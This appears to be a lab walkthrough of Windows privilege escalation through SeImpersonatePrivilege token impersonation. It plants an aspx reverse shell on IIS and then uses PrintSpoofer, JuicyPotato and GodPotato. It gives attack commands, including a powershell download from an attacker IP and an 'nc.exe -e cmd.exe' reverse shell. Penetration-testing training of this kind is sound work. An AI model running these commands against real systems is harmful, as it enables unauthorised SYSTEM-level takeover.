Windows Privilege Escalation — Token Impersonation (SeImpersonatePrivilege)

Introduction

Any process that has this privilege can impersonate a token, but it won’t actually create it.

A privileged token can be obtained from a Windows Service (DCOM) that performs an NTLM authentication against the exploit and then executes a process as SYSTEM.

Exploit it with juicy-potato, RogueWinRM (needs winrm disabled), SweetPotato, PrintSpoofer , and GodPotato.

Lab Setup

There is a functionality called “Turn Windows features on or off”.

Go to Internet Information Service → World Wide Web → Application Development Features → Select all the options

Select all the boxes , which are marked yellow in below poc:

Initail Shell

IIS service will be installed and one directory will be created inside “inetpub”

Here we have enabled the aspx service, keep one aspx reverseshell(shell21.aspx) file, this will be equivalent to like you uploaded a webshell and got RCE.

Trigger the webshell either using “curl” or visiting website.

Exploit

The technique is called “Token Impersonation” for that we need SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.

Both of the privileges should be present/available irrespective of enabled/disabled.

For exploiting we will use one tool printspoofer.

https://github.com/dievus/printspoofer

Download “PrintSpoofer” from local machine to target machine.

To escalate privileges, the service account must have SeImpersonate privileges.

Now Execute the following command:

$print.exe -i -c cmd.exe

Successfully got the ‘nt authority\system’. We have maximum level privileges.

Method 2: Using JuicyPotato.exe

Successfully got the initial shell.

Checking the privileges of the user.

Observe that the user has “SEImpersonatePrivileges”.

Create one revershell file using msfvenom.

Download the JuicyPotato :

https://github.com/ohpe/juicy-potato/releases/tag/v0.1

Transfer the reverseshell file (i.e., shell1234.exe) to the target machine.

Then run the JuicyPotato.exe i.e., Potato.exe in the target system.

$Patato.exe -t * -p shell.exe -l 443

Start netcat listener on the port mentioned in the reverse shell,

Method 3: Using GodPotato

Successfully got the initial shell.

Checking the privileges of the user.

Observe that the user has “SEImpersonatePrivileges”.

Download the GodPotato on the local machine, transfer it to the target machine, and transfer Netcat too.

$powershell -c wget http://192.168.45.162:8001/GodPotato-NET4.exe -OutFile potato.exe

Netcat (nc.exe) and GodPotato(potaot.exe) transferred to Target Machine.

Now run the GodPotato-NET4.exe i.e., potato.exe in the target system.

$potato.exe -cmd "C:\Users\nathan\Nexus\nexus-3.21.0-05\nc.exe -e cmd.exe 192.168.45.162 4040"

Start Netcat listener.

Successfully got the shell, but the “whoami” command is not working properly.

Let’s navigate into the “Administrator” directory to confirm that we got the Administrator privilege shell.